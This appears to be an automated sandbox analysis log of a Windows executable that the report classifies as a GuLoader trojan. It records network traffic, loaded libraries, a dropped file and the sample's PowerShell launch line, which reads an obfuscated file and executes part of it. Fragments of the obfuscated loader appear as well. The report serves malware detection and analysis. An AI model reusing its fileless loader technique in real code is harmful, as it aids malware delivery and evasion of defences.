    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
    Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
    Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49974 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.9:49975 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49976 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49978 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49980 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49982 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49986 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49988 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49990 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49994 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49996 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49998 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:50002 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:50004 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:50010 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:50012 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:50014 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:50016 version: TLS 1.2
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeCode function: 0_2_00405139 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405139

    System Summary

    barindex
    Powershell drops PE file
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens\YrCSUX2O3I.exeJump to dropped file
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeCode function: 0_2_004031DD EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004031DD
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeCode function: 0_2_004049760_2_00404976
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeCode function: 0_2_004064EC0_2_004064EC
    Source: YrCSUX2O3I.exeStatic PE information: invalid certificate
    Source: YrCSUX2O3I.exe, 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamehampert.exeDVarFileInfo$ vs YrCSUX2O3I.exe
    Source: YrCSUX2O3I.exeBinary or memory string: OriginalFilenamehampert.exeDVarFileInfo$ vs YrCSUX2O3I.exe
    Source: YrCSUX2O3I.exe.2.drBinary or memory string: OriginalFilenamehampert.exeDVarFileInfo$ vs YrCSUX2O3I.exe
    Source: YrCSUX2O3I.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: classification engineClassification label: mal100.troj.evad.winEXE@6/15@2/2
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeCode function: 0_2_00404430 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404430
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeFile created: C:\Users\user\AppData\Roaming\PolysulfonateJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_03
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeFile created: C:\Users\user\AppData\Local\Temp\nshF4D7.tmpJump to behavior
    Source: YrCSUX2O3I.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: YrCSUX2O3I.exeVirustotal: Detection: 59%
    Source: YrCSUX2O3I.exeReversingLabs: Detection: 57%
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeFile read: C:\Users\user\Desktop\YrCSUX2O3I.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\YrCSUX2O3I.exe "C:\Users\user\Desktop\YrCSUX2O3I.exe"
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Willock=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Hjtryks.Tog';$Fysiologen=$Willock.SubString(2860,3);.$Fysiologen($Willock)"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Willock=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Hjtryks.Tog';$Fysiologen=$Willock.SubString(2860,3);.$Fysiologen($Willock)" Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: YrCSUX2O3I.exeStatic file information: File size 1069784 > 1048576

    Data Obfuscation

    barindex
    Yara detected GuLoader
    Source: Yara matchFile source: 00000008.00000002.2577978803.000000000452E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
    Found suspicious powershell code related to unpacking or dynamic code loading
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Nicolett $Paduasoy $Boblegummiens), (Beograd @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Montricernes = [AppDomain]::CurrentDomain.GetAssemblies()$glob
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Pisciculture)), $Uvantes).DefineDynamicModule($Subtread, $false).DefineType($Achieves154, $Deltidens, [System.MulticastDelegate])$Doce
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeCode function: 0_2_004060B0 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004060B0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens\YrCSUX2O3I.exeJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Loading BitLocker PowerShell Module
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
